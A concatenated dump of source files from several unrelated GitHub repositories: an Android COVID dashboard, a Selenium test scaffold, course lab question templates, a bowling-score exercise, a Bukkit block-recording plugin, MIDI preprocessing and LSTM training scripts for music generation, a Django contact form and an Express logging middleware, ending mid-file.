        holder.textViewDeaths.setText(String.valueOf(currentData.getTotalDeaths()));
        holder.textViewRecovered.setText(String.valueOf(currentData.getTotalRecovered()));
    }

    @Override
    public int getItemCount() {
        return listData.size();
    }

    /**
     * Caches the row's four text views. Declared static so each holder does
     * not keep an implicit reference to the adapter instance.
     */
    public static class MyViewHolder extends RecyclerView.ViewHolder {
        TextView textViewCountry, textViewTotalCases, textViewDeaths, textViewRecovered;
        public MyViewHolder(@NonNull View itemView) {
            super(itemView);
            textViewCountry = itemView.findViewById(R.id.textViewCountry);
            textViewTotalCases = itemView.findViewById(R.id.textViewTotalCases);
            textViewDeaths = itemView.findViewById(R.id.textViewDeaths);
            textViewRecovered = itemView.findViewById(R.id.textViewRecovered);
        }
    }
}
<file_sep>package com.coronadashboard.utils;
import android.provider.BaseColumns;
/**
 * String constants whose names suggest they are persistence keys for the
 * seek-bar filter bounds (min/max of case, death and recovered counts).
 * NOTE(review): the values ("a", "ab", ...) look like placeholders; they work
 * as long as they stay unique, but renaming them would orphan any values
 * already stored under the old keys — confirm before changing.
 */
public class AppConstants implements BaseColumns {
    public static final String seekbarMinCaseValue = "a";
    public static final String seekbarMaxCaseValue = "ab";
    public static final String seekbarMinDeathValue = "abc";
    public static final String seekbarMaxDeathValue = "abcd";
    public static final String seekbarMinRecoveredValue = "abce";
    public static final String seekbarMaxRecoveredValue = "abcf";
}
<file_sep>package com.coronadashboard.utils;
import com.coronadashboard.model.Country;
import java.util.Comparator;
/**
 * Comparators for ordering Country rows by each of the three headline
 * statistics, all ascending.
 */
public class Sorting {

    public static class SortByTotalCases implements Comparator<Country>
    {
        // Used for sorting in ascending order of Total Cases.
        @Override
        public int compare(Country o1, Country o2) {
            // Integer.compare avoids the overflow that plain subtraction can
            // produce when the operands are far apart.
            return Integer.compare(o1.getTotalConfirmed(), o2.getTotalConfirmed());
        }
    }

    public static class SortByRecovered implements Comparator<Country>
    {
        // Used for sorting in ascending order of Recovered.
        @Override
        public int compare(Country o1, Country o2) {
            return Integer.compare(o1.getTotalRecovered(), o2.getTotalRecovered());
        }
    }

    public static class SortByDeaths implements Comparator<Country>
    {
        // Used for sorting in ascending order of Deaths.
        @Override
        public int compare(Country o1, Country o2) {
            return Integer.compare(o1.getTotalDeaths(), o2.getTotalDeaths());
        }
    }
}
| 715cb17efecc05622999f0e277403bc6c14a7415 | [
"Java",
"Gradle"
] | 4 | Gradle | avi-nitb/Corona_Dashboard | 8ef65b927c3d17543f0dc99e7d2ae3626c46221f | 2dd9a1842ba865eac6c71dc0a3b2cbfae7b6ae25 |
refs/heads/master | <repo_name>NavneetKaurPopli/technavneetpopli<file_sep>/web_testing/src/test/java/UVicTest.java
import static org.junit.jupiter.api.Assertions.*;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import org.openqa.selenium.By;
import org.openqa.selenium.Keys;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.chrome.ChromeDriver;
import org.openqa.selenium.firefox.FirefoxDriver;
import org.openqa.selenium.safari.SafariDriver;
import org.openqa.selenium.support.ui.ExpectedConditions;
import org.openqa.selenium.support.ui.WebDriverWait;
import java.util.concurrent.TimeUnit;
/**
 * Scaffold for Selenium WebDriver tests. setUp() launches a fresh maximized
 * browser before each test (Chrome by default; commented alternatives for
 * Firefox and Safari) and cleanUp() quits it afterwards.
 */
public class UVicTest {

    // Driver instance shared by the test methods of a single test run.
    WebDriver browser;

    @BeforeEach
    public void setUp() {
        // Chrome
        System.setProperty("webdriver.chrome.driver", "*****LOCATION OF YOUR WEBDRIVER*****");
        browser = new ChromeDriver();

        // Firefox
        // System.setProperty("webdriver.gecko.driver", "*****LOCATION OF YOUR WEBDRIVER*****");
        // browser = new FirefoxDriver();

        // Safari
        // browser = new SafariDriver();

        browser.manage().window().maximize();
    }

    @AfterEach
    public void cleanUp() {
        browser.quit();
    }

    // Your tests go here
}
<file_sep>/Labs/Lab_7/readme.txt
Exercise 2:
Answer one question only, NOT ALL SIX.
Indicate which number question you've decided to answer (1-6):
Your answer (100 words max):
<file_sep>/Labs/Lab_1/readme.txt
Your name:
Your student number:
Questions:
----------------------
1. Why can’t we exhaustively test our entire software project? What should we do instead?
Your answer to question 1 (max 100 words):
----------------------
2. What is the pesticide paradox about and what does it imply to software testers?
Your answer to question 2 (max 100 words):
----------------------
3. Why should we automate, as much as possible, the test execution?
Your answer to question 3 (max 100 words):
=======================
Our feedback will appear below this line once your answers are marked:
1.
2.
3.
<file_sep>/Labs/Lab_3/readme.txt
Your name:
Your student number:
Questions:
----------------------
3. Execute the smoke test, with coverage enabled. Name 2 classes that are not well tested.
Take a look at those classes, and speculate as to their purpose. (0.5%)
Your answer to question 3 (max 100 words):
----------------------
4. Is the move() method in the game.Game class covered by the smoke test? (0.5%)
Your answer to question 4 (max 100 words, but yes or no will be fine):
----------------------
5. Change the getDeltaX() method in board.Direction, so that it returns deltaY instead.
Rerun the smoke test and note the resulting error. Is the error message you see helpful in
diagnosing the problem, or is there not enough context to figure out what went wrong?
Would you prefer a smoke test or a unit test if you had to fix the problem from scratch? (0.5%)
Make sure you undo the change to getDeltaX() before moving on to the next question.
Your answer to question 5 (max 100 words):
-----------------------
6. Skim over the Game, Unit, Board and Level classes and explain (max 100 words) how it
appears these four classes are related to each other – what role does each play? What
does each represent? (0.5%)
Your answer to question 6 (max 100 words):
<file_sep>/Labs/Lab_5/readme.txt
Exercise 2:
Questions:
----------------------
Which standards testing tool did you use? (Just the name is enough - example: Lighthouse)
Your answer to question 3 (max 100 words):
----------------------
Name any test that passed, and describe what the test found in your own words. (Example:
Passed the 'super nice colours test'. This test checks to see if all the colours on the webpage
are super nice. They were all shades of purple, and purple is super nice.) (not a real test,
but hopefully that helps.) (100 words max):
----------------------
Name any test that failed (yellow or red) and describe what the test found in your own words.
(Example: failed the 'make my dinner' test. The webpage got only 5% on the test, because it
completely failed to make my dinner.) (again, just an example) (100 words max):
<file_sep>/Ten_Pin_Bowling/settings.gradle
rootProject.name = 'tpb_working'
<file_sep>/Ten_Pin_Bowling/src/main/java/app/BowlingGame.java
package app;
import java.util.ArrayList;
/**
 * Scores a game of ten-pin bowling from the flat list of rolls.
 * NOTE(review): createFrames() is exercise scaffolding — the marked section
 * currently stores the placeholder roll -1 for every frame and never consumes
 * this.rolls, so score() does not yet return meaningful values.
 */
public class BowlingGame {

    // A standard game always has ten frames.
    public static final int NUMBER_OF_FRAMES = 10;

    // Every roll of the game in order, as pin counts.
    private final int[] rolls;

    public BowlingGame(int[] rolls) {
        this.rolls = rolls;
    }

    /** Total score: the sum of the per-frame scores of all ten frames. */
    public int score() {
        int result = 0;
        ArrayList<BowlingFrame> frames = createFrames();
        for (BowlingFrame frame: frames) {
            result += frame.score();
        }
        return result;
    }

    /** Partition this.rolls into NUMBER_OF_FRAMES BowlingFrame objects. */
    private ArrayList<BowlingFrame> createFrames() {
        ArrayList<BowlingFrame> frames = new ArrayList<>();
        // Presumably the cursor into rolls for the completed implementation;
        // unused while the placeholder below remains.
        int rollIndex = 0;
        for (int i = 0; i < NUMBER_OF_FRAMES; i++) {
            ArrayList<Integer> frameRolls = new ArrayList<>();
            // add/change code below
            frameRolls.add(-1);
            // add/change code above
            frames.add(new BowlingFrame(frameRolls));
        }
        return frames;
    }
}
| b9add2ab7f67785727beca8f2b275f0b9c40143f | [
"Java",
"Text",
"Gradle"
] | 7 | Java | NavneetKaurPopli/technavneetpopli | 8755722ee9edb2cc797fc0ef6026e90656c75060 | 6ffdb1f46c1c6122712f725807169b6e820dd102 |
refs/heads/main | <file_sep>package me.warpromo.bridging;
import java.util.ArrayList;
import java.util.HashMap;
import org.bukkit.block.Block;
import org.bukkit.event.EventHandler;
import org.bukkit.event.Listener;
import org.bukkit.event.block.BlockPlaceEvent;
/**
 * Bukkit listener that records the blocks placed by players who are in
 * "recording" mode (tracked in the owning plugin's maps).
 */
public class ClickEvent implements Listener {

    private final Main plugin;

    public ClickEvent(Main plugin) {
        this.plugin = plugin;
    }

    /**
     * Appends each placed block to the recording player's block list.
     * Players without an active recording session are ignored.
     */
    @EventHandler
    public void placeBlock(BlockPlaceEvent e) {
        String playerName = e.getPlayer().getName();
        // Only track players with an active recording session.
        if (!plugin.recording.containsKey(playerName)) return;
        ArrayList<Block> blocks = plugin.placedBlocks.get(playerName);
        // Guard against a recording flag with no registered block list,
        // which previously caused a NullPointerException here.
        if (blocks == null) return;
        // The list is mutated in place, so writing it back with replace()
        // (as the old code did) was a no-op; debug printlns removed.
        blocks.add(e.getBlock());
    }
}
| 7d9a88de9adc830ced70eded29585b6da5786290 | [
"Java"
] | 1 | Java | WarPromo/bridging-plugin | d24c0f6d6a1e7d4c5f4567ce772a2dc2e171443b | 2bdc78b6d378cd4fb5490e78ffd7ff3e2c8f70c6 |
refs/heads/master | <repo_name>JDoI/repo<file_sep>/nande/app/controllers/index.js
// Alert the current text of label1 when it is tapped.
function doClickLabel1(e) {
  alert($.label1.text);
}

// Alert when button1 is clicked (message text: "clicked").
function doClickButton1(e) {
  alert('クリックされました');
}

// Alert when switch1 is toggled (message text: "changed").
function doClickSwitch1(e) {
  alert('変更されました');
}

// Show a share option dialog (title text: "What do you want to share with?").
function doOptionDialog1(e) {
  var dialogOptions = {
    title:'なにでシェアしますか?',
    // Options are numbered in order: aa = 0, bb = 1, cancel = 2.
    options:['aa','bb','キャンセル'],
    // Index of the cancel option.
    cancel:2,
    // Index of the option rendered in the destructive (red) colour.
    destructive:0
  };
  var dialog = Titanium.UI.createOptionDialog(dialogOptions);
  dialog.show();
}

$.index.open();
| af3e7fb0ca4753fb3075da6a01cdd6d0e9e8d0c5 | [
"JavaScript"
] | 1 | JavaScript | JDoI/repo | 9c58d51df887615f6406ec3ddc5626a44d699b2d | 3afd1557beb4efc91e2cae0a2c776280fc378edb |
refs/heads/master | <repo_name>alexjjseppala/capstone<file_sep>/preprocessing/pickled_midi_cleaner.py
import os
import pickle
from shutil import copyfile
# Keep only the pickled songs whose every token is a valid index into the
# shared notes dictionary, and copy those into clean_pickled_midis/.
with open('preprocessing/notes_dictionary', 'rb') as f:
    output_dictionary = pickle.load(f)

# Tokens in a clean song must never exceed the last dictionary slot.
dictionary_max = len(output_dictionary) - 1

for filename in os.listdir('preprocessing/pickled_input_midis'):
    if not filename.endswith(".mid"):
        continue
    with open('preprocessing/pickled_input_midis/' + filename, "rb") as fp:
        pickled_values = pickle.load(fp)
    # Equivalent to the original early-exit scan: every value must be in range.
    if all(value <= dictionary_max for value in pickled_values):
        copyfile('preprocessing/pickled_input_midis/' + filename,
                 'preprocessing/clean_pickled_midis/' + filename)
<file_sep>/preprocessing/test.py
from music21 import *
import pickle
import os
import sys
# with open('preprocessing/pickled_input_midis/pickled_Een-Roos-Kan-Niet-Zonder-Zonneschijn.mid', "rb") as fp:
# pickled_values = pickle.load(fp)
with open('preprocessing/pickled_ZZs_song.mid', "rb") as fp:
pickled_values = pickle.load(fp)
with open('preprocessing/notes_dictionary', "rb") as fp:
notes_dictionary = pickle.load(fp)
# parsed_midi = converter.parse('preprocessing/downsampled_midis_test/Een-Roos-Kan-Niet-Zonder-Zonneschijn.mid')
for i in range(len(pickled_values)):
print(notes_dictionary[pickled_values[i]])<file_sep>/preprocessing/src_midis_cleaner.py
import os
import pickle
from shutil import copyfile
#go through clean_pickled_midis
filenames = os.listdir('preprocessing/clean_pickled_midis')
for filename in filenames:
if filename.endswith(".mid") and filename.startswith("pickled_"):
#MOVE found midis from src_midis to used_src_midis
os.rename("preprocessing/src_midis/" + str(filename[8:]), "preprocessing/used_src_midis/" + str(filename[8:]))<file_sep>/nueralNet(1).py
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.layers import Activation
from keras.utils import np_utils
from keras import backend
from keras.callbacks import ModelCheckpoint
import pickle
import numpy
import os
# Get song ints
def getSongInts(directory):
    """Return the pickled list of note-dictionary indices for the reference
    song ``pickled_ZZs_song.mid`` stored under ``directory``."""
    song_path = directory + "/" + "pickled_ZZs_song.mid"
    with open(song_path, "rb") as handle:
        return pickle.load(handle)
# Get Sequence
def getSequencesFromFile(fileToExtractSeqences, seqLength, directory):
    """Slide a window of length ``seqLength`` over a pickled integer song.

    Returns ``(sequences, sequenceOutput)`` where ``sequences[i]`` is the
    window of ``seqLength`` ints starting at position ``i`` and
    ``sequenceOutput[i]`` is the int immediately following that window
    (the training target for the window).
    """
    sequences = []
    sequenceOutput = []
    with open(directory + "/" + fileToExtractSeqences, "rb") as fp:
        songIntList = pickle.load(fp)
    # Bug fix: the loop bound previously hard-coded 100, so with any other
    # seqLength the windows/targets were mis-sized or indexed out of range.
    # Behavior is unchanged for the existing call site (seqLength == 100).
    for i in range(0, len(songIntList) - seqLength):
        sequenceOutput.append(songIntList[i + seqLength])
        sequences.append(songIntList[i:i + seqLength])
    return sequences, sequenceOutput
def testSequenceAccuracy(sequencesToTest, directory):
    # Sanity check: print whether each extracted window matches the
    # corresponding 100-token slice of the reference song.
    # NOTE(review): ``sequence[0]`` is compared against a list slice; for the
    # plain nested lists built by getSequencesFromFile that comparison is
    # always False — ``sequence == songInts[start:stop]`` looks like the
    # intent, unless callers pass the reshaped (seqLength, 1) arrays.
    # The hard-coded 100 also assumes seqLength == 100. Confirm with callers.
    songInts = getSongInts(directory)
    start = 0
    stop = 100
    for sequence in sequencesToTest:
        print(sequence[0] == songInts[start:stop])
        start += 1
        stop += 1
def buildNetwork(network_input, n_vocab):
    """ create the structure of the neural network """
    # Three stacked 512-unit LSTMs with dropout, a 256-unit dense bottleneck
    # and a softmax over the n_vocab note-dictionary entries.
    # network_input is used only for its (timesteps, features) shape.
    model = Sequential()
    model.add(LSTM(
        512,
        input_shape=(network_input.shape[1], network_input.shape[2]),
        return_sequences=True
    ))
    model.add(Dropout(0.3))
    model.add(LSTM(512, return_sequences=True))
    model.add(Dropout(0.3))
    model.add(LSTM(512))
    model.add(Dense(256))
    model.add(Dropout(0.3))
    model.add(Dense(n_vocab))
    model.add(Activation('softmax'))
    # sparse_categorical_crossentropy matches the integer (non-one-hot)
    # targets produced by getSequencesFromFile.
    model.compile(loss='sparse_categorical_crossentropy', optimizer='rmsprop')
    return model
def train(model, network_input, network_output):
    """ train the neural network """
    # Save the weights after any epoch in which the training loss improves;
    # the epoch number and loss are embedded in the checkpoint file name.
    filepath = "weights-improvement-{epoch:02d}-{loss:.4f}-bigger.hdf5"
    checkpoint = ModelCheckpoint(
        filepath,
        monitor='loss',
        verbose=0,
        save_best_only=True,
        mode='min'
    )
    callbacks_list = [checkpoint]
    model.fit(network_input, network_output, epochs=200, batch_size=64, callbacks=callbacks_list)
# ---- training driver ----
sequenceLength = 100  # window size fed to the LSTM
sequenceList = []
sequenceOutputList = []
# NOTE(review): machine-specific absolute path — adjust per environment.
midiDir = "C:/Users/a-sho/Documents/AQueensWork/4thyear/ELEC498/code/PickledMidis"
# Collect (window, next-token) training pairs from every pickled song.
for filename in os.listdir(midiDir):
    if filename.endswith(".mid"):
        newSequences, newOutputs = getSequencesFromFile(filename, sequenceLength, midiDir)
        for seq in newSequences:
            sequenceList.append(seq)
        for out in newOutputs:
            sequenceOutputList.append(out)
# Reshape to the LSTM input layout: (samples, timesteps, features=1).
sequenceList = numpy.reshape(sequenceList, (len(sequenceList), sequenceLength, 1))
#sequenceOutputList = sequenceOutputList[0:(int(len(sequenceOutputList)/4))]
#sequenceOutputList = backend.sparse_categorical_crossentropy(sequenceOutputList)
# Vocabulary size = number of distinct entries in the shared notes dictionary.
with open('notes_dictionary', "rb") as fp:
    notesDictionary = pickle.load(fp)
notesLength = len(set(notesDictionary))
model = buildNetwork(sequenceList, notesLength)
train(model, sequenceList, sequenceOutputList)
print("")
<file_sep>/preprocessing/preprocessing_combined.py
#run "nohup python preprocessing/preprocessing_combined.py &" on the server to run the script on the full dataset
# the output will be written to nohup.out at the top level project src_directory
from music21 import *
import os
import time
import sys
import signal
import pickle
# output_dictionary = []
def test_request(arg=None):
    """Your http request."""
    # Placeholder "request" used to exercise the Timeout context manager:
    # sleeps two seconds and echoes its argument back unchanged.
    time.sleep(2)
    return arg
class Timeout():
    """Timeout class using ALARM signal."""
    # Context manager that raises Timeout.Timeout if the `with` body runs for
    # longer than `sec` seconds. Unix-only: relies on SIGALRM.

    class Timeout(Exception):
        # Raised from the signal handler when the alarm fires.
        pass

    def __init__(self, sec):
        # sec: whole seconds before the alarm fires (signal.alarm precision).
        self.sec = sec

    def __enter__(self):
        # Install the handler first, then arm the alarm.
        signal.signal(signal.SIGALRM, self.raise_timeout)
        signal.alarm(self.sec)

    def __exit__(self, *args):
        # NOTE(review): only the pending alarm is cancelled here; the previous
        # SIGALRM handler is not restored.
        signal.alarm(0) # disable alarm

    def raise_timeout(self, *args):
        raise Timeout.Timeout()
#converts all midi files in the midi_downsampling_step_1/src_midis to simpler version (2 tracks, one piano one percussion)
#and stores them into midi_downsampling_step_1/dst_midis
src_directory = "preprocessing/src_midis"
def note_array_to_pitch_string(note):
    """Render a note/chord slot as its space-terminated pitch names.

    The sentinel value 0 (an empty position in the time grid) and rests both
    map to the empty string; otherwise each pitch contributes
    ``nameWithOctave`` followed by a single space.
    """
    if note == 0 or note.isRest:
        return ""
    return "".join(pitch.nameWithOctave + " " for pitch in note.pitches)
def downsample(parsed_midi_tracks):
    """Collapse an arbitrary MIDI track list down to two tracks.

    Tracks that use channel 10 (the General MIDI percussion channel) are
    grouped as percussion; every other track is grouped as "piano". The two
    groups are flattened into one Part each and re-emitted as a MidiFile with
    track 0 on channel 1 (piano) and track 1 on channel 10 (percussion).
    NOTE(review): the two setChannel calls assume both groups were non-empty;
    confirm behavior for files with no percussion tracks.
    """
    piano_tracks = []
    percussion_tracks = []
    for track in range(len(parsed_midi_tracks)):
        channels = parsed_midi_tracks[track].getChannels()
        if 10 in channels:
            percussion_tracks.append(parsed_midi_tracks[track])
        else:
            piano_tracks.append(parsed_midi_tracks[track])
    outStream = stream.Stream()
    piano_notes = []
    percussion_notes = []
    if len(piano_tracks) > 0:
        piano_stream = midi.translate.midiTracksToStreams(piano_tracks)
        piano_notes = piano_stream.flat.notesAndRests
    if len(percussion_tracks) > 0:
        percussion_stream = midi.translate.midiTracksToStreams(percussion_tracks)
        percussion_notes = percussion_stream.flat.notesAndRests
    #in theory the normalization and training could be done here
    #or this script could be run to pre-simplify the midi files first
    outStream.append(stream.Part(piano_notes))
    outStream.append(stream.Part(percussion_notes))
    downsampled_midi = midi.translate.streamToMidiFile(outStream)
    # outFile.open('midi_downsampling_step_1/dst_midis/' + filename, "wb")
    # outFile.write()
    # outFile.close()
    downsampled_midi.tracks[0].setChannel(1)
    downsampled_midi.tracks[1].setChannel(10)
    # downsampled_midi.open('preprocessing/downsampled_midis_test/' + filename, "wb")
    # downsampled_midi.write()
    # downsampled_midi.close()
    return downsampled_midi
def normalize_prep(downsampled_midi):
    """Convert a downsampled MidiFile into a pickled integer sequence.

    Both tracks are chordified, laid out on a common time grid whose step is
    the shortest note duration found in either track, and each grid slot's
    (piano_pitches, percussion_pitches) string pair is mapped to an index in
    the shared, persistent ``notes_dictionary``. The resulting index list is
    pickled to ``preprocessing/pickled_input_midis/pickled_<filename>``.

    NOTE(review): this relies on the module-global ``filename`` (set by the
    driver loop below) for the output name instead of taking a parameter.
    Side effects: rewrites preprocessing/notes_dictionary; when the dictionary
    does not exist yet, an empty list is also written to
    preprocessing/notes_dictionary_prev.
    """
    # Load (or create) the persistent tuple -> index dictionary.
    if os.path.exists('preprocessing/notes_dictionary'):
        with open('preprocessing/notes_dictionary', 'rb') as f:
            # The protocol version used is detected automatically, so we do not
            # have to specify it.
            output_dictionary = pickle.load(f)
    else:
        print("making new dictionary")
        output_dictionary = []
        with open("preprocessing/notes_dictionary_prev", "wb") as fp: #Pickling
            pickle.dump(output_dictionary, fp)
    downsampled_midi_stream = midi.translate.midiFileToStream(downsampled_midi)
    #flat combines all voices(not sure why it wasnt fully flattened before, but had to move on)
    #chordify combines all notes with same offset into a chord for each stream
    piano_stream = downsampled_midi_stream[0].flat.chordify()
    #combine and sychronize the piano and percussion notes and chords together
    #find shortest duration and longest time in each stream to dermine the lowest sample rate
    #which is used to create the synchronized array sizes
    smallest_interval = min([x['durationSeconds'] for x in piano_stream.secondsMap])
    highest_time = piano_stream.highestTime
    if len(downsampled_midi_stream) == 2:
        percussion_stream = downsampled_midi_stream[1].flat.chordify()
        percussion_smallest_interval = min([x['durationSeconds'] for x in percussion_stream.secondsMap])
        smallest_interval = min(smallest_interval,percussion_smallest_interval)
        highest_time = max(highest_time, percussion_stream.highestTime)
    # One slot per smallest_interval step; 0 marks an empty slot.
    note_array_percussion = [0] * round(highest_time/smallest_interval)
    note_array_piano = [0] * round(highest_time/smallest_interval)
    #put each note or chord into the array based on their offsets
    for i in range(len(piano_stream)):
        note_array_piano[round(piano_stream[i].offset/smallest_interval)] = piano_stream[i]
    if len(downsampled_midi_stream) == 2:
        for i in range(len(percussion_stream)):
            note_array_percussion[round(percussion_stream[i].offset/smallest_interval)] = percussion_stream[i]
    nn_normalized_input = []
    # Per-call cache of tuple -> index lookups; avoids repeated O(n)
    # output_dictionary.index scans for tuples already seen in this song.
    cache = {}
    if len(downsampled_midi_stream) == 2:
        # Piano + percussion: key each slot by the pair of pitch strings.
        for i in range(len(note_array_percussion)):
            #construct the dictionary tuple
            piano_pitches = note_array_to_pitch_string(note_array_piano[i])
            percussion_pitches = note_array_to_pitch_string(note_array_percussion[i])
            if (piano_pitches,percussion_pitches) in cache:
                dictionary_index = cache[(piano_pitches,percussion_pitches)]
            elif (piano_pitches,percussion_pitches) in output_dictionary:
                dictionary_index = output_dictionary.index((piano_pitches,percussion_pitches))
                cache[(piano_pitches,percussion_pitches)] = dictionary_index
            else:
                # First time this tuple is seen anywhere: append and index it.
                output_dictionary.append((piano_pitches,percussion_pitches))
                dictionary_index = len(output_dictionary) - 1
                cache[(piano_pitches,percussion_pitches)] = dictionary_index
            nn_normalized_input.append(dictionary_index) #turn into float with dictionary index later
    else:
        # Piano only: the percussion half of each tuple is the empty string.
        for i in range(len(note_array_piano)):
            #construct the dictionary tuple
            piano_pitches = note_array_to_pitch_string(note_array_piano[i])
            percussion_pitches = ""
            if (piano_pitches,percussion_pitches) in cache:
                dictionary_index = cache[(piano_pitches,percussion_pitches)]
            elif (piano_pitches,percussion_pitches) in output_dictionary:
                dictionary_index = output_dictionary.index((piano_pitches,""))
                cache[(piano_pitches,percussion_pitches)] = dictionary_index
            else:
                output_dictionary.append((piano_pitches,percussion_pitches))
                dictionary_index = len(output_dictionary) - 1
                cache[(piano_pitches,percussion_pitches)] = dictionary_index
            nn_normalized_input.append(dictionary_index) #turn into float with dictionary index later
    # Persist the (possibly grown) dictionary and this song's index sequence.
    with open("preprocessing/notes_dictionary", "wb") as fp: #Pickling
        pickle.dump(output_dictionary, fp)
    with open("preprocessing/pickled_input_midis/pickled_" + filename, "wb") as fp: #Pickling
        pickle.dump(nn_normalized_input, fp)
def preprocess(filename):
    """Parse one MIDI file from ``src_directory``, downsample it to a
    piano + percussion track pair and pickle its normalized note sequence.

    Single-track files whose only track uses channel 10 (pure percussion)
    are skipped: they carry no melodic content to train on.
    """
    filepath = src_directory +"/" + filename
    parsed_midi = midi.MidiFile()
    parsed_midi.open(filepath, "rb")
    parsed_midi.read()
    parsed_midi.close()
    parsed_midi_tracks = parsed_midi.tracks
    #removing single track songs with percussion
    if len(parsed_midi_tracks) == 1 and 10 in parsed_midi_tracks[0].getChannels():
        print("skipping " + str(filename))
    else:
        downsampled_midi = downsample(parsed_midi_tracks)
        # normalize_prep pickles its result to disk as a side effect and
        # returns None; the previous unused locals (piano_tracks,
        # percussion_tracks, nn_normalized_input) have been removed.
        normalize_prep(downsampled_midi)
# ---- batch driver: preprocess every MIDI file in src_directory ----
start = time.time()
filenames = os.listdir(src_directory)
total = len(filenames) - 1
count = 0
for filename in filenames:
    if filename.endswith(".mid"):
        count += 1
        # One-line progress indicator ("count/total"), overwritten in place.
        sys.stdout.write("\r" + str(count) + "/" + str(total))
        sys.stdout.flush()
        try:
            # Some files stall music21's parser; allow 90 seconds per file.
            with Timeout(90):
                preprocess(filename)
        except Exception as e:
            # Skip any file that times out or fails to parse/convert.
            print(e)
            print("skipping " + str(filename))
            continue
    else:
        continue
end = time.time()
sys.stdout.write("\nDone!\nTime elapsed: " + str(end - start)) | 40e060ac56afca4d68b96471acb3c4b00a3e6968 | [
"Python"
] | 5 | Python | alexjjseppala/capstone | 2ad3c58af1fc2373191357d0750927896ff3678a | a86c65a2fc862b09673947115596b59888d6611e |
refs/heads/master | <file_sep>'use strict';
var gulp = require('gulp');
var sass = require('gulp-sass');
var sassLint = require('gulp-sass-lint');
var livereload = require('gulp-livereload');
var http = require('http');
var st = require('st');
gulp.task('sass', function () {
return gulp.src(['./src/stylesheets/*.scss'])
.pipe(sassLint())
.pipe(sassLint.format())
.pipe(sassLint.failOnError())
.pipe(sass({outputStyle: 'compressed'}).on('error', sass.logError))
.pipe(gulp.dest('./dist'))
.pipe(livereload());
});
gulp.task('watch', ['server'], function () {
livereload.listen({ basePath: 'dist' });
gulp.watch(['./src/stylesheets/*.scss', './src/stylesheets/**/*.scss'], ['sass']);
});
gulp.task('server', function(done) {
http.createServer(
st({ path: __dirname + '/dist', index: 'index.html', cache: false })
).listen(8080, done);
});
| e3e34179058d51ccc5ec00963619e8913888d538 | [
"JavaScript"
] | 1 | JavaScript | paulrrdiaz/flexbox | a39e45f63a67177716eea0fa01085560a5991f55 | ce020fb30469d03d10ad02db45257f1b97e63525 |
refs/heads/master | <file_sep>echo "*** Producing HTML ***"
# Build mysample.adoc into the remaining formats (DocBook, EPUB, PDF).
# Abort immediately if any step fails so later steps do not consume stale
# or missing intermediate files (e.g. pandoc reading an old mysample.xml).
set -e

asciidoctor mysample.adoc
echo "*** Producing DOCBOOK ***"
asciidoctor -n -b docbook -d book mysample.adoc -o mysample.xml
echo "*** Producing EPUB ***"
pandoc -f docbook -t epub -N --number-sections --chapters --toc --toc-depth=4 mysample.xml -o mysample.epub
echo "*** Producing PDF ***"
asciidoctor-pdf mysample.adoc
| b4840b6b259a6229285eb5dd1fa828b0dea29220 | [
"Shell"
] | 1 | Shell | nidmgh/nidmbook | 2abb6832f649eb2966ae382f7bcdfa99890024a8 | 92936ec337ff06c1cb4acded6ceaa3b93620643a |
refs/heads/master | <file_sep>from django import forms
class ContactForm(forms.Form):
    """Contact form shown on the landing page; its cleaned data is e-mailed
    by the ``root`` view."""
    full_name = forms.CharField(max_length=120)   # sender's display name
    email = forms.EmailField(max_length=150)      # sender's address
message = forms.CharField(widget= forms.Textarea, max_length=2000)<file_sep>from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.core.mail import send_mail, BadHeaderError
from rootapp.forms import ContactForm
# Create your views here.
def root(request):
    """Landing page plus contact-form handler.

    GET  -> render the page with an unbound ContactForm.
    POST -> validate the submission; on success e-mail the message and
            re-render with ``submitted`` set so the template can show a
            confirmation. On a validation failure the *bound* form is
            re-rendered so the user sees the field errors (previously a
            fresh form replaced it and the errors were silently lost).
    """
    if request.method == 'POST':
        form = ContactForm(request.POST)
        if form.is_valid():
            subject = 'website_inquiry'
            body = {
                'name': form.cleaned_data['full_name'],
                'email': form.cleaned_data['email'],
                'message': form.cleaned_data['message'],
            }
            message = "\n".join(body.values())
            try:
                send_mail(subject, message, '<EMAIL>', ['<EMAIL>'])
            except BadHeaderError:
                return HttpResponse("Invalid Header Found.")
            # Success: show the confirmation with a fresh, empty form.
            return render(request, 'rootapp/index.html',
                          {'form': ContactForm(), 'submitted': True})
        # Invalid POST: fall through with the bound form so errors render.
    else:
        form = ContactForm()
    return render(request, 'rootapp/index.html', {'form': form, 'submitted': False})
"Python"
] | 2 | Python | seemab-yamin/resumeproject | b03e67c48dfd8d89428e6934f5633fa3dcc5c8cd | 33e22e41dfff91cf9884baf4c060f32f0da6508f |
refs/heads/main | <repo_name>rubytsaitw/middleware-practice<file_sep>/app.js
const express = require('express')
const app = express()
const PORT = 5000
// Convert the elapsed time since `start` (a process.hrtime() tuple) into
// fractional milliseconds.
const getActualRequestDurationInMilliseconds = start => {
  const NS_PER_SEC = 1e9; // convert to nanoseconds
  const NS_TO_MS = 1e6; // convert to milliseconds
  const diff = process.hrtime(start);
  return (diff[0] * NS_PER_SEC + diff[1]) / NS_TO_MS;
};

// Logging middleware: prints a timestamp, the HTTP method, the URL and how
// long the request took, once the response has been sent.
let demoLogger = (req, res, next) => {
  // Capture the start time before handing off to the route handlers; the
  // previous version measured hrtime immediately after taking it, so it
  // always logged ~0 ms and never covered the actual request duration.
  const start = process.hrtime();
  let currentDateTime = new Date();
  let formattedDate =
    currentDateTime.getFullYear() +
    '-' +
    (currentDateTime.getMonth() + 1) + // getMonth() is 0-based; +1 = calendar month
    '-' +
    currentDateTime.getDate() +
    ' ' +
    currentDateTime.getHours() +
    '-' +
    currentDateTime.getMinutes() +
    '-' +
    currentDateTime.getSeconds();
  let method = req.method;
  let url = req.url;
  // Log when the response finishes so the duration spans the whole cycle.
  res.on('finish', () => {
    const durationInMilliseconds = getActualRequestDurationInMilliseconds(start);
    console.log(`${formattedDate} | ${method} from ${url} | total time: ${durationInMilliseconds.toLocaleString()} ms`);
  });
  next();
};
// Register the request logger for every route.
app.use(demoLogger)
// List all todos.
app.get('/', (req, res) => {
  res.send('列出全部 Todo')
})
// Page for creating a new todo.
app.get('/new', (req, res) => {
  res.send('新增 Todo 頁面')
})
// Show a single todo by id.
app.get('/:id', (req, res) => {
  res.send('顯示一筆 Todo')
